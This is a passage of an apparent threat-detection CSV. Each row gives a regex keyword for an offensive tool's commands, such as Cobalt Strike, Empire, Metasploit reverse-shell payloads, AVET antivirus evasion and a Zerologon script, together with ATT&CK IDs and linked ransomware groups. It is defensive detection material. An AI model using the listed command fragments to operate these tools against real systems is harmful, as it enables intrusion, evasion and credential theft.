TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","58525" "*set https_proxy=http://127.0.0.1:9999*",".{0,1000}set\shttps_proxy\=http\:\/\/127\.0\.0\.1\:9999.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - 
multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","58526" "*set keylogger*",".{0,1000}set\skeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58527" "*set LFILE /*",".{0,1000}set\sLFILE\s\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58528" "*Set Listener dbx*",".{0,1000}Set\sListener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 
- T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58529" "*set Listener onedrive*",".{0,1000}set\sListener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - 
FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58530" "*set obfuscate *",".{0,1000}set\sobfuscate\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58531" "*set PAYLOAD windows/x64/meterpreter_reverse_tcp*",".{0,1000}set\sPAYLOAD\swindows\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","58532" "*set PAYLOAD windows/x64/shell/reverse_tcp*",".{0,1000}set\sPAYLOAD\swindows\/x64\/shell\/reverse_tcp.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","58533" "*set pipename *",".{0,1000}set\spipename\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black 
Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58534" "*set Profile apt1.profile*",".{0,1000}set\sProfile\sapt1\.profile.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit 
- MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58535" "*set shellcode *",".{0,1000}set\sshellcode\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","58536" "*set smartinject*",".{0,1000}set\ssmartinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - 
PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58537" "*set spoofip 1*",".{0,1000}set\sspoofip\s1.{0,1000}","offensive_tool_keyword","metasploit","llmnr spoofing used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58538" "*set StageEncoder x86/shikata_ga_nai*",".{0,1000}set\sStageEncoder\sx86\/shikata_ga_nai.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58539" "*Set the correct channel name using """"pscmdchannel"""" command*",".{0,1000}Set\sthe\scorrect\schannel\sname\susing\s\""pscmdchannel\""\scommand.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over 
the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","58540" "*set userwx*",".{0,1000}set\suserwx.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58544" "*set webserver_address hashcapture.com*",".{0,1000}set\swebserver_address\shashcapture\.com.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","58545" "*set zombie *",".{0,1000}set\szombie\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58547" "*set_child werfault.exe*",".{0,1000}set_child\swerfault\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58548" "*set_command_exec exec_via_cmd*",".{0,1000}set_command_exec\sexec_via_cmd.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58549" "*set_command_exec exec_via_powershell*",".{0,1000}set_command_exec\sexec_via_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58550" "*set_command_exec no_command*",".{0,1000}set_command_exec\sno_command.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58551" "*set_command_source download_bitsadmin*",".{0,1000}set_command_source\sdownload_bitsadmin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58552" "*set_decoder xor*",".{0,1000}set_decoder\sxor.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58553" "*set_empty_pw.py*",".{0,1000}set_empty_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tool","https://github.com/risksense/zerologon","1","1","N/A","N/A","N/A","7","657","146","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z","58554" "*set_injection_technique*",".{0,1000}set_injection_technique.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","58555" "*set_logon_script.py*",".{0,1000}set_logon_script\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. 
It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","N/A","2","120","12","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z","58556" "*set_objectpipe \\*",".{0,1000}set_objectpipe\s\\\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58557" "*set_payload_execution_method exec_shellcode64*",".{0,1000}set_payload_execution_method\sexec_shellcode64.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58558" "*set_payload_execution_method inject_dll*",".{0,1000}set_payload_execution_method\sinject_dll.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58559" "*set_payload_info_source from_command_line_raw*",".{0,1000}set_payload_info_source\sfrom_command_line_raw.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58560" "*set_payload_source download_powershell*",".{0,1000}set_payload_source\sdownload_powershell.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","58561" "*set_rpc_callstack*",".{0,1000}set_rpc_callstack.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
